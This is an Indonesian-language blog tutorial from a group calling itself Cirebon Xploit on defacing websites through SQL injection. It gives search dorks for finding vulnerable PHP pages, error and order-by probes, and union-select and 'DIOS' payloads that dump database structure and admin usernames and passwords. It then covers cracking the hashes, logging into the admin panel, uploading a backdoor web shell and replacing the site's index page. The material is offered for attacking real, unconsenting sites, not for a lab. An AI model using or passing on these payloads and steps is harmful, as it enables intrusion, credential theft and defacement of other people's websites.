Tutorial Deface Poc Sql Injection
Hallo Sobat Bertemu Lagi Dengan Saya Nekell404. Pada Kesempatan Kali Ini Saya Akan Berbagi Tutorial Deface Poc Sql Injection.
Bahan-Bahannya
- Dork
- Shell backboor
- SC Deface
- internet , kuota , wifi
- kopi , roko
Dork :
- inurl:berita.php?id= site:
- Inurl:content.php?id= site:
- inurl:index.php?id= site:
- inurl:main.php?id= site:
Langsung saja ketutorialnya
Pertama kita Ngedork dulu iyaa ka
Saya sudah menemukan web vuln sql Injection
Lalu kita cek dengan tanda (') atau url %27
Contoh : https://sitekalian.com/berita.php?id=10'
Atau https://sitekalian.com/berita.php?id=10%27
Tidak semua web menggunakan tanda (') atau %27
Jika site berubah tampilan atau error kemungkinan besar vuln
Jika sudah cek vuln apa ngga nya kita lanjut mencari letak angka ajaibnya
Kita Order by dlu
Contoh : https://sitekalian.com/berita.php?id=10'+order+by+1--+-
Atau https://sitekalian.com/berita.php?id=10%27%20order%20by%201--%20-
Kita lanjut ke Union Select
Contoh : https://sitekalian.com/berita.php?id=10'+union+select+1,2,3,4,5,6--+-
Atau https://sitekalian.com/berita.php?id=10%27%20union%20select%201,2,3,4,5,6--20-
Kita lanjut menggunakan Dios
Dios : concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
Contoh : .https://sitekalian.com/berita.php?id=10'+union+select+1,2,3,4,concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),6--+-
Jika sudah bakal nongol Dios kalian
Dan cari username + password Menggunakan Dios dump u/p
Dios Dump U/p : concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(table_name)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x, username,0x203a3a20,password,0x3c62723e))))x))
Contoh : https://sitekalian.com/berita.php?id=10'+union+select+1,2,3,4,concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(table_name)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x, username,0x203a3a20,password,0x3c62723e))))x)),6--+-
Tools hash : https://hashes.com/en/decrypt/hash
Jika sudah terhash password nya kita cari adlognya atau tempat loginannya
Biasanya di login.php atau admin.php
Contoh : https://sitekalian.com/login.php
Jika sudah login kalian cari tempat upload Shell backdor nya
Biasanya tempatnya di add berita atau add galeri
Tinggal kalian tamper data saja
Jika sudah upload Shell tinggal kalian tebas index atau nitip file saja
Itu saja tutorial dari saya Cirebon Xploit
Terimakasih
Note : maaf bila tutorialnya tidak jelas atau kurang jelas
Support by Cirebon Xploit.
Posting Komentar untuk "Tutorial Deface Poc Sql Injection"